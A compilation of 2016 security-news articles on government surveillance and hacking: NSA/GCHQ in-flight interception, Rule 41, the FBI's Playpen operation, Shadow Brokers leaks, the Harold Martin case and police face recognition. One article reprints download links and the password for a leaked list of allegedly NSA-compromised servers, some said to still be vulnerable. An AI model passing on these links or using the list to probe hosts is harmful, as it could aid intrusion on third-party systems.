Available in near real time (approximately 10 minute delay)”
According to the presentation leaked by Snowden, the GCHQ and the NSA are able to intercept the transmission from the satellites to the ground stations.

Thieving Magpie allowed the intelligence agencies to spy on flights in Europe, the Middle East, and Africa, but according to the presentation, it was designed for a global surveillance.

The surveillance program allows data collection in “near real time,” spies can track aircraft every two minutes while in flight.

Thieving Magpie program allows spying on any data sent via the GSM network, the cyber spies could access gather e-mail addresses, Facebook IDs, and Skype addresses. It also allows monitoring of Twitter, Google Maps, BitTorrent, and VoIP.

According to Le Monde, the CIA was especially interested in Air France and Air Mexico flights, because they are potential targets for terrorists.

“We can read that, as from the end of 2003, ‘the CIA considered that Air France and Air Mexico flights were potential targets for terrorists’.” states the article published by Le Monde “The legal department of the NSA stated at this point ‘there is absolutely no legal problem in targeting aircraft from these two companies abroad’ and ‘they should be kept under strict surveillance from the point at which they enter American air space’.”


Uber asks to track your location even when you’re not using the app
5.12.2016 securityaffairs BigBrothers

The last update for the Uber app raises great concerns because it asks to track users’ location even when they’ve been dropped off and exited the program.
The last update of the Uber App allows it to track the passengers’ locations even when they have been dropped off and the application is running in the background of a customer’s smartphone. With this new feature, the application is able to track passenger up to five minutes after a trip has finished.

uber privacy

Before this upgrade, Uber was able to follow its passengers only when they had the app open.
According to Uber, the new feature has been implemented to better allow drivers and passengers in locating each other. A representative from the company explained that the upgrade will improve the user experience reducing the ETA estimates.

“We do this to improve pickups, drop-offs, customer service, and to enhance safety. Trip Related Location Data is collected during the following times:

– When you are interacting with the Uber app and the app is foregrounded and visible.
– When you’re on a trip: from the time you request a trip until when the trip is ended or cancelled by the driver, even if the Uber app is running in the background and not visible to you.
– Up to five minutes after the driver ends a trip, even if the Uber app is in the background.” reads the statement published by Uber on its website.

Anyway, don’t worry, you still have the ability to choose to share or not your data setting information sharing options to “Always” or “Never.”
Watch out, if you chose the “Never” option, every time your will need to take a ride you will be forced to enter the pick-up and drop-off locations manually.

Obviously, the upgrade has raised heated debate by privacy advocates in the US.

The Electronic Privacy Information Centre promptly filed a complaint with the US Federal Trade Commission for what it considers as “unfair and deceptive trade practice.”


Rule 41 — FBI Gets Expanded Power to Hack any Computer in the World
1.12.2016 thehackernews BigBrothers
Hacking multiple computers across the world just got easier for the United States intelligence and law enforcement agencies from today onwards.
The changes introduced to the Rule 41 of the Federal Rules of Criminal Procedure by the United States Department of Justice came into effect on Thursday, after an effort to block the changes failed on Wednesday.
The change grants the FBI much greater powers to hack into multiple computers within the country, and perhaps anywhere in the world, with just a single warrant authorized by any US judge (even magistrate judges). Usually, magistrate judges only issue warrants for cases within their jurisdiction.
That's the same the FBI did in its 2015 investigation into child pornography site Playpen, in which the agency hacked into some 8,700 computers across 120 different countries.
The Supreme Court approved the changes to Rule 41 in April, allowing any U.S. judge to issue search warrants that give the FBI and law enforcement agencies authority to remotely hack computers in any jurisdiction, or even outside the United States.
Democratic Senator Ron Wyden attempted three times to block changes to Rule 41 that potentially risks people using Tor, a VPN, or some other anonymizing software to hide their whereabouts, but the efforts were blocked by Republican Senator John Cornyn of Texas.
The rule change should take effect on 1st December, today, barring surprises.
On the one hand, privacy advocates and legal experts have described the rule change as the extensive expansion of extraterritorial surveillance power that will allow agencies like the FBI to carry out international hacking operations with a lot less of a hassle.
On the other hand, the DOJ argued that the changes to the rule will help investigate modern internet criminals, allowing investigators access computers whose locations are "concealed through technological means," like the Tor anonymity network or VPNs (Virtual Private Networks), and devices used in botnets that have become powerful cyber weapons.
Assistant Attorney General Leslie Caldwell highlighted these concerns in a blog post published last week, saying if a criminal suspect is using Tor or VPN to hide its real location, it becomes tough for investigators to know his/her current location.
"So in those cases, the Rules do not clearly identify which court the investigators should bring their warrant application to," Caldwell said.
But what would happen if the FBI hacks the botnet victims, rather than the perpetrators? Or what if the government abuses this power to target nation states?
In a speech, Wyden said that the changes to Rule 41 amounted to "one of the biggest mistakes in surveillance policy in years," giving federal investigators "unprecedented authority to hack into Americans' personal phones, computers, and other devices," Reuters reports.
Other critics worry that the changes to Rule 41 would give the FBI unfettered ability to hack innocent users whose electronic devices have been infected with botnet malware without their knowledge, or anyone who keeps their identities private online.
To this concern, Caldwell argued that investigators accessing the devices of botnet victims "would, typically, be done only to investigate the extent of the botnet," or in order to "obtain information necessary to liberate victims’ computers from the botnet."
Caldwell further argued that the rule change would not allow the FBI to conduct "Mass Hacking;" in fact, failing to implement the rule change "would make it more difficult for law enforcement to combat mass hacking by actual criminals."


GCHQ presents CyberChef, an Open Source Data Analysis Tool
30.11.2016 securityaffairs BigBrothers
The GCHQ has released the code of a new open source web tool dubbed CyberChef, specifically designed for analyzing and decoding data.
Open data are a privileged source for intelligence agencies, almost any government is largely investing in technology to analyze them.

Recently the British intelligence Agency, the Government Communications Headquarters (GCHQ), has launched a new open source web tool specifically designed for analyzing and decoding data.

The tool dubbed CyberChef has been presented by the GCHQ as the “Cyber Swiss Army Knife.”

“CyberChef is a simple, intuitive web app for carrying out all manner of “cyber” operations within a web browser. These operations include creating hexdumps, simple encoding like XOR or Base64, more complex encryption like AES, DES and Blowfish, data compression and decompression, calculating hashes and checksums, IPv6 and X.509 parsing, and much more.” reads the description published by the GCHQ on GitHub.

“The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years. Every effort has been made to structure the code in a readable and extendable format, however it should be noted that the analyst is not a professional developer and the code has not been peer-reviewed for compliance with a formal specification.”

cyberchef-gchq

A point of strength is its user-friendly interface, even non-technical people could analyze encryption, compression and decompression, and data formats with simple drag and drop operations.

The CyberChef is a powerful tool for data analysis that could be used by multiple categories of users, including mathematicians, data analysts, developers and even casual puzzle solvers.

According to the GCHQ, CyberChef runs in Chrome and Firefox, the Agency expects that contributors will soon make it possible to execute it also in Microsoft Edge .

The tool could be used to manipulate different types of data, decode Base64 strings, convert data from a hexdump and perform many other operations.

The GCHQ released the source code of the tool on GitHub alongside with a demo. The GCHQ is inviting the community of developers to contribute to the improvement of the tool.

“It is hoped that by releasing CyberChef through Github, contributions can be added which can be rolled out into future versions of the tool, and is an excellent example of GCHQ providing a platform on which to base cybersecurity operations,” GCHQ said.


FBI Hacked into 8,000 Computers in 120 Countries Using A Single Warrant
24.11.2016 thehackernews BigBrothers
The FBI hacked into more than 8,000 computers in 120 different countries with just a single warrant during an investigation into a dark web child pornography website, according to a newly published court filings.
This FBI's mass hacking campaign is related to the high-profile child pornography Playpen case and represents the largest law enforcement hacking campaign known to date.
The warrant was initially issued in February 2015 when the FBI seized the Playpen site and set up a sting operation on the dark web site, in which the agency deployed malware to obtain IP addresses from alleged site's visitors.
The piece of malware used by the FBI is known as a Network Investigative Technique (NIT). The malware was used for at least 13 days to break into the computer of users who visited certain threads on Playpen and then sent their IP addresses back to the bureau.
Earlier this year, court documents related to the Playpen case revealed that the FBI hacked over 1,000 alleged visitors of Playpen in the U.S. using a single warrant, along with computers in Australia, Chile, Colombia, Austria, Denmark, Greece, the UK, Turkey, and Norway during the investigation.
However, the new federal court hearing transcript from a related case reveals that the hack went much further farther and wider than previously believed and that the bureau actually hacked into more than 8,000 users' computers across 120 different countries.
"We have never, in our nation's history as far as I can tell, seen a warrant so utterly sweeping," federal public defender Colin Fieman said in a court hearing at the end of October, according to the transcript.
According to the transcript, the FBI also hacked what has been described as a "satellite provider." "So now we are into outer space as well," Fieman said.
"The fact that a single magistrate judge could authorise the FBI to hack 8,000 people in 120 countries is truly terrifying," Christopher Soghoian, a principal technologist at the American Civil Liberties Union (ACLU), told Motherboard.
The major controversy surrounding the Playpen case has been that Virginia-based US Magistrate Judge Theresa C. Buchanan who signed the warrant did not have the authority to authorize such searches.
The fact is that the magistrate judges are a more junior type of judges who don't actually have jurisdiction to issue warrants outside their own districts. Only more senior federal judges, known as district judges, have the authority to issue such warrants under Rule 41.
However, this would likely change with the changes introduced to the Rule 41 of the Federal Rules of Criminal Procedure by the US Department of Justice.
Changes to Rule 41 will Further Expand FBI's Mass Hacking Capabilities
The changes to Rule 41 will grant the FBI much greater powers to hack into any computer within the country, and perhaps anywhere in the world, with just a single search warrant authorized by any US judge (even magistrate judges).
The changes in this rule are set to take effect on December 1, 2016.
"The US government wants to use an obscure procedure—amending a federal rule known as Rule 41— to radically expand their authority to hack," the Electronic Frontier Foundation (EFF) said. "The changes to Rule 41 would make it easier for them to break into our computers, take data, and engage in remote surveillance."
However, the DoJ further defended the changes to Rule 41 in a Monday blog post.
"We believe technology shouldn't create a lawless zone merely because a procedural rule has not kept up with the times," writes Assistant Attorney General Leslie R. Caldwell of the Criminal Division.
If take into effect, privacy activists and cybersecurity experts believe that the US law enforcement will most likely use the changes to Rule 41 to further expand their capabilities of mass hacking techniques.


Donald Trump will control the NSA – what this means for your privacy
18.11.2016 securityaffairs BigBrothers

Earlier this week, Donald Trump won a stunning election victory that will put him in charge of the world’s most powerful mass surveillance infrastructure.
Regardless of which side of the political spectrum you are on, Trump’s control over the NSA is now an indisputable fact, and we think it is worth taking a closer look at what this means. It is important to note that as a Swiss company which benefits from Swiss government support, ProtonMail follows the Swiss policy of neutrality. We do not take any position for or against Trump, nor any position for or against any particular country or government. We believe privacy is an universal value, so we do not take any sides.

However, given America’s significant influence on the world, and the large number of ProtonMail users who come from the US, we are not a disinterested party. Furthermore, we realise that the implications of a Trump presidency also interest a large proportion of the ProtonMail community, so we are here today to offer our unbiased opinion.

How much power over the NSA does Trump have?
Due to the way the US government is structured, President Trump will have a large amount of control over the NSA. The NSA is not different from any other federal agency which the president controls. The US president will be able to dictate how the agency operates through his power to appoint the NSA Director. The NSA Director needs to be confirmed through majority vote by the US Senate, but due to Republican control over the Senate, President Trump will have complete freedom to appoint anyone he wants to carry out his orders.

As a federal agency however, the activities of NSA are governed by federal law, in particular, the Foreign Intelligence Surveillance Act. However, with Republican control over both houses of Congress, President Trump would have broad power to rewrite FISA as he sees fit or introduce a new law. Of course, a new law could be subject to court challenge which could eventually work its way up to the US Supreme court, but Trump is also expected to gain control over the Supreme court. Therefore, all things considered, there is no denying that President Trump would have broad powers to re-shape the US surveillance apparatus to serve his agenda.

Should Americans Be Worried?
Since Trump’s victory, the number of new users coming to ProtonMail has doubled compared to the previous week.Many of our new users have voiced a few common concerns both on Twitter and also in emails to us. Given Trump’s campaign rhetoric against journalists, political enemies, immigrants, and Muslims, there is concern that Trump could use the new tools at his disposal to target certain groups. As the NSA currently operates completely out of the public eye with very little legal oversight, all of this could be done in secret.

protonmail-trump
ProtonMail new user signups doubled immediately after Trump’s election victory.

It is not Trump’s fault
It is tempting to blame all this on Trump and his supporters, but that is taking the easy way out. All Trump does is put a new face on the existing privacy problem, so now it concerns a segment of the population that previously didn’t care as much. ProtonMail users have always come from both the left and right side of the political spectrum. Today, we are seeing an influx of liberal users, but ProtonMail has also long been popular with the political right, who were truly worried about big government spying, and the Obama administration having access to their communications. Now the tables have turned.

The same terror the political right has experienced is now being felt in liberal bubbles such as Silicon Valley for the first time. The left is correct to be terrified of a Trump-led NSA snooping on their communications, especially since Silicon Valley giants like Google and Facebook can be forced to spy on users on behalf of Trump’s NSA. However, this precedent was not set by Trump – he hasn’t even taken office yet. The first major incident of a US tech giant being complicit in US government spying actually took place in 2015 under the Obama administration.

Privacy is something we must all champion
One of the problems with having a technological infrastructure that can be abused for mass surveillance purposes, is that governments can and do change, quite regularly in fact. This demonstrates that privacy isn’t just a liberal or conservative issue, it is something that we all need to champion, regardless of our political leanings. This is why ProtonMail is committed to building a safe haven for all people in the world, regardless of nationality, political views, or religious beliefs.

The only way to protect our freedom is to build technologies, such as end-to-end encryption, which cannot be abused for mass surveillance. Governments can change, but the laws of mathematics upon which encryption is based, are much harder to change.

What can you do to protect your privacy rights?
Privacy is a non-partisan issue, and we hope politicians around the world wake up to the fact that privacy is not only essential for democracy, it is also critical for securing the growing digital economy. In the case of encrypted email services such as ProtonMail, you even get better security in addition to the privacy. Privacy is a cause that we should all be able to unify behind, regardless of political beliefs.

In the meantime, there are fortunately a growing number of services which can help to keep government spies out of your communications, so there is no need to worry regardless of who wins the election. For securing your email, ProtonMail offers free encrypted email accounts, although you can support ProtonMail by donating or upgrading to a paid account.

For defending against NSA mass surveillance, we also recommend the Signal messaging app, using a VPN service, or using an alternative search engine such as duckduckgo.com or qwant.com. But most importantly, spread the word about the dangers of mass surveillance so politicians take note and make protecting our digital rights a priority.

About the author The ProtonMail Team

Donald Trump will control the NSA – what this means for your privacy


Shadow Brokers reveals list of Servers Hacked by the NSA
1.11.2016 thehackernews BigBrothers
The hacker group calling itself the Shadow Brokers, who previously claimed to have leaked a portion of the NSA’s hacking tools and exploits, is back with a Bang!
The Shadow Brokers published more files today, and this time the group dumped a list of foreign servers allegedly compromised by the NSA-linked hacking unit, Equation Group, in various countries to expand its espionage operations.
Top 3 Targeted Countries — China, Japan, and Korea
The data dump [Download / File Password: payus] that experts believe contains 306 domain names, and 352 IP addresses belong to at least 49 countries. As many as 32 domains of the total were run by educational institutes in China and Taiwan.
A few target domains were based in Russia, and at least nine domains include .gov websites.
The top 10 targeted countries include China, Japan, Korea, Spain, Germany, India, Taiwan, Mexico, Italy, and Russia.
The latest dump has been signed by the same key as the first Shadow Brokers’ dump of NSA exploits, though there is a lot to be done to validate the contents of the leaked data dump fully.
Targeted Systems — Solaris, Unix, Linux and FreeBSD
Most of the affected servers were running Solaris, Oracle-owned Unix-based operating system, while some were running FreeBSD or Linux.
Each compromised servers were reportedly targets of INTONATION and PITCHIMPAIR, code-names given for cyber-spy hacking programs.
The data dump also contains references to a list of previously undisclosed Equation Group tools, including Dewdrop, Incision, Orangutan, Jackladder, Reticulum, Patchicillin, Sidetrack and Stoicsurgeon.
The tools as mentioned above could be hacking implants, tools or exploits used by the NSA's notorious group.
Security researcher Mustafa Al-Bassam, an ex-member of Lulzsec and the Anonymous hacking collective, said the NSA likely compromised all the servers between 2000 and 2010.
"So even the NSA hacks machines from compromised servers in China and Russia. This is why attribution is hard," Al-Bassam added.
Are Hackers trying to influence U.S. Presidential elections?
A message accompanying the leaked data dump calls for attempts to disrupt the forthcoming United States presidential election. The portion of message from the Shadow Brokers reads:
"TheShadowBrokers is having suggestion. On November 8th, instead of not voting, maybe be stopping the vote all together? Maybe being grinch who stopped the election from coming? Maybe hacking election is being the best idea? #hackelection2016."
Targeted victims can use the leaked files in an effort to determine if they were the potential target of the NSA-linked hacking unit.
Since the records are old, many servers should now be clean of infection. However, a brief Shodan scan of these domains indicates that some of the affected servers are still active and still running old, possibly-vulnerable systems.
The latest release comes after the FBI arrested Harold Thomas Martin, an NSA contractor, who was reportedly a prime suspect in The Shadow Brokers case.


NSA Hackers The Shadow Brokers leaked another dump with NSA targets
1.11.2016 securityaffairs BigBrothers

The ShadowBrokers hacker group leaked a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.
The notorious Shadow Brokers hacker group has posted a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.

The hackers disclosed the list containing historic targets of the Equation Group, it includes Mail providers, Chinese targets, and universities.

The Equation group compromised the targets using the hacking tools codenamed as INTONATION and PITCHIMPAIR.

The latest dump leaked by the Shadow Brokers was signed using the same key used to sign the first dump of Equation Group exploits.

The ShadowBrokers provided the links to two distinct PGP-encrypted archives, the first one offered for free as a proof of the hack (its passphrase was ‘auctioned’), for the second one the group requested 1 million BTC .

The first archive contains roughly 300MBs of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.

The security researchers Mustafa Al-Bassam has published an interesting post that lists all the exploits, implants, and tools for hacking firewalls (“Firewall Operations”) included in the dump.

The Equation Group ‘s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.

The majority of files are at least three years old, meanwhile, the newest timestamp dating to October 2013.

Early October, TheShadowBrokers complained that no one seems to be bidding on their precious archive, an alleged member of the hacker group expressed his dissent on the lack of interest in ponying up bitcoins to release the full NSA data dump.

A couple of weeks ago the group announced the launch of a crowdfunding campaign for the stolen arsenal because its auction received offers for less than two bitcoins.

Back to the present day, the ShadowBrokers hackers published message accompanying the latest dump.

“TheShadowBrokers is having special trick or treat for Amerikanskis tonight.” “Why is DirtyGrandpa threating CIA cyberwar with Russia? Why not threating with NSA or CyberCommand? CIA is cyber B-Team, yes? Where is cyber A-Team? Maybe threating is not being for external propaganda? Maybe is being for internal propaganda? Oldest control trick in book, yes? Waving flag, blaming problems on external sources, not taking responsibility for failures. But neverminding, hacking DNC is way way most important than EquationGroup losing capabilities. Amerikanskis is not knowing USSA cyber capabilities is being screwed? Where is being “free press”? Is ABC, NBC, CBS, FOX negligent in duties of informing Amerikanskis? Guessing “Free Press” is not being “Free as in free beer” or “Free as in free of government influence?” reads the message.

According to security experts, the list is very old, it is available at the following links

https://mega.nz/#F!D1Q2EQpD!Lb09shM5XMZsQ_5_E1l4eQ
https://yadi.sk/d/NCEyJQsBxrQxz

Password = payus

Segui
Kevin Beaumont ✔ @GossiTheDog
The Shadow Brokers continue to grapple for publicity and money. The list of servers is 9 years old, likely no longer exist or reinstalled. https://twitter.com/shadowbrokerss/status/792936856925143040 …
09:18 - 31 Ott 2016
6 6 Retweet 17 17 Mi piace
A close look at the dump revealed that it contains some 300 folders of files. Each file corresponds to a different domain and IP address.

The notorious expert Hacker Fantastic analyzed the dump and confirmed that it contains 306 domains and 352 IP addresses relating to 49 countries in total.

Segui
Hacker Fantastic @hackerfantastic
306 domain names, 352 ip addresses contained in @shadowbrokerss leak, mostly ASIAPAC region. descriptions here http://pastebin.com/RK73grmu
10:26 - 31 Ott 2016
21 21 Retweet 16 16 Mi piace
Visualizza l'immagine su Twitter
Visualizza l'immagine su Twitter
Segui
Hacker Fantastic @hackerfantastic
There are 49 countries impacted by the Solaris attack exposed by @shadowbrokerss - vast majority of those are in ASIAPAC region.
11:53 - 31 Ott 2016
31 31 Retweet 14 14 Mi piace
The dump revealed targets in Russia, China, India, Sweden, and many other countries. The Top 10 countries include also Japan and Italy.

The colleague Carola Frediani reported the presence of Italian targets that includes systems in some university, such as the Università dell’Aquila (sipralab.univaq.it; matematica.univaq.it; ns.univaq.it) and the ‘Università degli Studi Mediterranea di Reggio Calabria (ns.ing.unirc.it).

Below a graph from by a preliminary study conducted by the researcher Quequero ‏@quequero on addresses published by the ShadowBrokers and allegedly used by the NSA as staging servers/C&C.

quequero-shadowbrokers-server-country

The machines compromised by the US Intelligence may have been used to target systems worldwide and deliver exploits.

Visualizza l'immagine su TwitterVisualizza l'immagine su TwitterVisualizza l'immagine su Twitter
Segui
Mustafa Al-Bassam @musalbas
New Shadow Brokers dump contains list of servers compromised by the NSA to use as exploit staging servers.


The German parliament passes controversial a surveillance law
25.10.2016 securityaffairs BigBrothers

The German Parliament passed a controversial surveillance law that seems to give more power to the BND intelligence agency.
The German Parliament last week approved a controversial espionage law that theoretically will tighten oversight of the BND intelligence agency, but that according to privacy advocates will give more power to the authorities.

The experts focused their critic on a controversial clause of the law that allows the BND to eavesdrop communications of foreign organizations and individuals on German soil and abroad that is in transit through a major internet exchange point in Frankfurt.

The Frankfurt-based operator DE-CIX in September filed a suit at a court in Leipzig against the government due to the new law that is considered illegal.

The German Government sustains that the measured approved by the surveillance law will allow it to investigate online crime and terrorism.

“How do we want to find terror suspects? How do we want to detect them if not through those means?” said Clemens Binninger a lawmaker with Chancellor Angela Merkel’s conservative party.

In the past, the BND was not authorized from spying its population, but the new controversial surveillance law will allow it under specific circumstances.

BND was only allowed to monitor up to 20 percent of traffic at one exchange point, but the new law gives full power and no limitation to the agency while spying on the Internet traffic.

“The law stipulates that through this activity it cannot be ruled out that the communications of German citizens and entities could also be accidentally intercepted, a major shift for the BND, which had been forbidden from spying on Germans.” reads a blog post published by the Reuters.

The Greens are expressing their disappointment to the law and have threatened to petition Germany’s highest court and the European Court of Justice to repeal the surveillance law.

This law is considered a serious threat to the privacy of the Germans, politicians and privacy defenders fear a dragnet surveillance.

Lawmaker Martina Renner of the hard-left Left party speculates the monitoring equipment used by the BND is not able to discern messages sent by foreigners from those of the Germans.

Surveillance activities conducted by the BND raised an intense debate on the internal political front. According to revelations published by the Der Spiegel, the agency supported the NSA in its global surveillance activities.

Der Eingangsbereich zur Zentrale des Bundesnachrichtendienstes (BND) in Pullach bei Muenchen, aufgenommen am Mittwoch (10.05.06). Entgegen urspruenglichen Planungen wird die Pullacher BND-Zentrale nun doch nicht geschlossen. Das technische Aufklaerungszentrum bleibt mit rund 1500 Mitarbeitern in Pullach, der Rest der insgesamt 6000 Mann starken Belegschaft zieht nach Berlin um. Foto: Johannes Simon/ ddp
Der Eingangsbereich zur Zentrale des Bundesnachrichtendienstes (BND) in Pullach bei Muenchen, aufgenommen am Mittwoch (10.05.06). Entgegen urspruenglichen Planungen wird die Pullacher BND-Zentrale nun doch nicht geschlossen. Das technische Aufklaerungszentrum bleibt mit rund 1500 Mitarbeitern in Pullach, der Rest der insgesamt 6000 Mann starken Belegschaft zieht nach Berlin um.
Foto: Johannes Simon/ ddp

The BND helped NSA in monitoring European politicians, the Intelligence Agency targeted private companies and entities worldwide in order to establish a dominance in the cyberspace. Among the victims, there was also the German Government and its politicians, including the chancellor Angela Merkel. The German Government was shocked at the time and expressly manifest his dissent to President Obama.

The BND supported espionage operations against various targets, including the European companies EADS (the manufacturer of Airbus planes) and Eurocopter, and European politicians, including German ones.

In August, the German weekly Die Zeit disclosed documents that reveal how the German Intelligence did a deal with the NSA to get the access to the surveillance platform XKeyscore.

Internal documents show that Germany’s domestic intelligence agency, the Federal Office for the Protection of the Constitution (BfV), received the software program XKeyscore from the NSA in return of data from Germany.

Back in 2o11, the NSA demonstrated the capabilities of the XKeyscore platform of the BfV agency. After two years of negotiation, the BfV signed an agreement to receive the NSA spyware software and install it for analyzing metadata collected on German citizens. In return, the German Agency promised to share metadata collected.

The NSA tool collects ‘nearly everything a user does on the internet’, XKeyscore gives ‘widest-reaching’ collection of online data analyzing the content of emails, social media, and browsing history.

In 2013, documents leaked by Edward Snowden explained that a tool named DNI Presenter allows the NSA to read the content of stored emails and it also enables the intelligence analysts to track the user’s activities on Facebook through a system dubbed XKeyscore.

According to Die Zeit, the document “Terms of Reference” stated: “The BfV will: To the maximum extent possible share all data relevant to NSA’s mission”.
The BfV didn’t provide the details of the agreement to Germany’s data protection commissioner, nor it informed the Parliamentary Control Panel.

In January, the BND has resumed its internet surveillance with the support of the NSA, the activities were suspended following the revelation on the mutual espionage activities. In July 2015 Wikileaks revealed an extended economic espionage activity conducted by the NSA in Germany, the spies were particularly interested in the Greek debt crisis.

Back to the new German surveillance law, it bans the Intelligence from spying on EU countries and its citizens, as well as EU institutions, except in the case of investigation of terrorist activity.

“It also requires the BND to submit requests for cooperation with other spy agencies with a parliamentary committee and bans the agency from carrying out industrial espionage.” states the Reuters.

“It requires the head of the BND, the chancellor’s office and an independent panel of judges to approve strategic foreign espionage activities.”


US contractor stole an astonishing quantity of data, including Equation Group tools
21.10.2016 securityaffairs BigBrothers

The US DoJ has charged the US contractor Harold Thomas Martin with theft of secret documents and highly classified government material.
A couple of months ago, the FBI announced the arrest of an NSA contractor, Harold Thomas Martin III, over a massive secret data theft.

The US DoJ has charged Harold Thomas Martin (51) with theft of secret documents and highly classified government material.
According to a court complaint, the stolen data include source codes developed by the NSA to its hacking campaigns against foreign governments.
The DoJ’s chief national security prosecutor John Carlin revealed that the US contractor was employed by Booz Allen Hamilton. Booz Allen Hamilton is the same defense contractor that employed the notoriousEdward Snowden at the time the whistleblower when he disclosed the mass surveillance program conducted by the NSA on a global scale.
Now, according to a new court document filed this week, the FBI seized at least 50 terabytes of data from the suspect that has stolen from government systems since 1996.According to the prosecutors, Harold Thomas Martin II has stolen an ‘astonishing quantity’ of documents, a huge trove of data containing at least 500 million pages of government records, including top-secret information about “national defense.”

According to the prosecutors, Harold Thomas Martin II has stolen an ‘astonishing quantity’ of documents, a huge trove of data containing at least 500 million pages of government records, including top-secret information about “national defense.”

“The defendant violated that trust by engaging in wholesale theft of classified government documents and property — a course of felonious conduct that is breathtaking in its longevity and scale,” prosecutors said.“The defendant was in possession of an astonishing quantity of marked classified documents which he was not entitled to possess, including many marked,” “The government anticipates that the charges will include violations of the Espionage Act, an offense that carries significantly higher statutory penalties and advisory guideline ranges than the charges listed in the complaint,” prosecutors added.

US contractor cyber heist

This volume of classified information stolen by the man could be far larger than Edward Snowden cyber heist. The investigators have discovered “six full bankers’ boxes” worth of documents, many of which were classified as “Secret” and “Top Secret.”

“The document appears to have been printed by the Defendant from an official government account,” read the court documents. “On the back of the document are handwritten notes describing the NSA’s classified computer infrastructure and detailed descriptions of classified technical operations.”

The New York Times reported that the stolen documents also included the NSA’s top secret hacking tools that were leaked online by the Shadow Brokers group who claimed the responsibility for the Equation Group hack.

According to the NY Times, the FBI has found forensic evidence that the hacking tools leaked online by the group had actually been on Martin’s computer.

Why did the US contractor steal the document?

It is still a mystery, people who know him describe him as a patriotic, a circumstance that suggests he would never have given classified information to another country. He never had a specific interest in politics, the FBI doesn’t exclude he might have sold the precious information for money.

“His annual salary in recent years has exceeded $100,000 and he owns his house without a mortgage. But he has long bought expensive suits and Rolex watches, according to an old acquaintance, and a person familiar with his finances says he has struggled with debt. Court records show one past lien, an $8,997 state tax bill imposed in 2000 and not paid off until 2014.” reported the NYT.

Martin is due to appear before US Magistrate Judge Beth P. Gesner for his detention hearing on Today in Baltimore.


Ex-NSA Contractor Stole 50 TB of Classified Data; Includes Top-Secret Hacking Tools
21.10.2016 thehackernews BigBrothers
Almost two months ago, the FBI quietly arrested NSA contractor Harold Thomas Martin III for stealing an enormous number of top secret documents from the intelligence agency.
Now, according to a court document filed Thursday, the FBI seized at least 50 terabytes of data from 51-year-old Martin that he siphoned from government computers over two decades.
The stolen data that are at least 500 million pages of government records includes top-secret information about "national defense." If all data stolen by Martin found indeed classified, it would be the largest NSA heist, far bigger than Edward Snowden leaks.
According to the new filing, Martin also took "six full bankers’ boxes" worth of documents, many of which were marked "Secret" and "Top Secret." The stolen data also include the personal information of government employees. The stolen documents date from between 1996 through 2016.
"The document appears to have been printed by the Defendant from an official government account," the court documents read. "On the back of the document are handwritten notes describing the NSA's classified computer infrastructure and detailed descriptions of classified technical operations."
Former NSA Insider Could Be Behind The Shadow Brokers
It's not clear exactly what Martin allegedly stole, but The New York Times reported Wednesday that the stolen documents also included the NSA's top secret hacking tools posted online by a supposed hacking group, calling itself Shadow Brokers, earlier this year.
Earlier this summer, Shadow Brokers claimed to have infiltrated NSA servers and stolen enormous amounts of data, including working exploits and hacking tools.
The NY Times report suggests that the FBI has found forensic evidence that the hacking tools and cyber-weapons posted online by the alleged hacking group had actually been on a contractor's machine.
NSA Contractor to Face Espionage Charges
Martin, a former Booz Allen Hamilton staffer like NSA whistleblower Snowden, should remain locked up and the government also plans to charge him with violations of the Espionage Act, Prosecutors said.
If convicted, one can face the death penalty.
Martin has "obtained advanced educational degrees" and has also "taken extensive government training courses on computer security," including in the areas of encryption as well as secure communications.
A former US Navy veteran, Martin allegedly used a sophisticated software that "runs without being installed on a computer system and provides anonymous Internet access, leaving no digital footprint on the Machine."
It's believed that Martin was using TAILS operating system or another USB-bootable operating system in conjunction with Tor or a VPN that would not leave any forensic evidence of his computer activities.
Martin's motives are still unclear, but among the seized documents, investigators uncovered a letter sent to Martin's colleagues in 2007, in which he criticized the information security practices of government and refers to those same co-workers as "clowns."
The letter reads: "I will leave you with this: if you do not get obnoxious, obvious, and detrimental to my future, then I will not bring you; into the light, as it were. If you do, well, remember that you did it to yourselves."
Martin is due to appear before US Magistrate Judge Beth P. Gesner for his detention hearing on Friday in Baltimore.


Police Scan 117 Million Driving Licence Photos for Face Recognition Database
19.10.2016 thehackernews BigBrothers
Your driver's license photo could be scarier than it actually looks — Well, here's why:
With the help of state driver's license data, U.S. law enforcement agencies have created a huge a face-recognition database of more than 117 Million American adults that are regularly scanned in the course of police investigations.
What's even worse? Most of those people who are scanned by police without prior knowledge are law-abiding citizens.
According to a 150-page study published Tuesday by the Center for Privacy & Technology at the Georgetown University, ID photographs of more than 117 Million adult US citizens — that's about half of the US population — are now part of the "Perpetual Line-up," which can be searched using facial-recognition software.
In the past few years, Facial Recognition technology has improved enormously. Even big technology companies like Facebook have developed so powerful facial recognition software that they can even identify you in photos even when your faces are hidden.
So, why would law enforcement be left behind?
Currently, at least 26 states reportedly allow their law enforcement agencies to run face recognition searches against their driver's license databases, while dozens of local law enforcement agencies are using commercial software to scan images captured by ATM cameras and other surveillance devices.
This clearly indicates that millions of law-abiding American citizens are potentially being pulled into the dragnet, raising legal and privacy concerns about the use of this facial recognition software, the report explains.
The report calls the use of facial recognition system "highly problematic" because of its potential to identify and monitor innocent citizens. Police departments usually keep fingerprint and DNA databases, but that are typically collected from criminals or people who have been arrested, not the common public.
"Innocent people don't belong in criminal databases," said Alvaro Bedoya, the co-author of the report. "By using face recognition to scan the faces on 26 states' driver's license and ID photos, police and the FBI have basically enrolled half of all adults in a massive virtual line-up. This has never been done for fingerprints or DNA. It's uncharted and frankly dangerous territory."
Another area of concern is that out of 52 agencies that use or have used face recognition, only one — Ohio's Bureau of Criminal Investigation — has a policy in place to prevent its officers from using the software to track religious, political or other free speech activities.
Accuracy is also a strong concern because facial recognition is far from perfect, as just one leading provider of face scanning tools says its reliability rating is only 95 percent.
Meanwhile, the facial-recognition technology is reportedly less accurate when used to identify black people, women and those aged 18 to 30.
"An accurate algorithm correctly identifies a face in an ATM photo and leads police to a robber's door," the report suggests. "An inaccurate algorithm sends them to the wrong house — and could send an innocent person to jail."
The report also describes how the facial recognition technology is spreading rapidly and is almost entirely unregulated.
